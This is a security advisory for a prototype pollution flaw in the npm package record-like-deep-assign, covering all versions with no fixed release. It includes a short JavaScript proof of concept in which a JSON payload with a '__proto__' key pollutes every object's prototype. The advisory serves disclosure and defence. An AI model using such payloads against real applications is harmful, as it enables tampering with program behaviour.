HIGH7.3
GHSA-7qm6-9v49-38m9
Prototype Pollution in record-like-deep-assign
Details
All versions of package record-like-deep-assign are vulnerable to Prototype Pollution via the main functionality.
### PoC ```js const deepAssign = require('record-like-deep-assign'); let obj = {}; console.log("Before being polluted: " + obj.polluted); EVIL_JSON = JSON.parse('{"__proto__":{"polluted":true}}'); deepAssign({}, EVIL_JSON); console.log("After being polluted: " + obj.polluted); ```
Are you affected?
Enter the version of the package you're using.
Affected packages
npm/record-like-deep-assign
Introduced in:
0No fixed version published yet for record-like-deep-assign (npm). Pin to a known-safe version or switch to an alternative.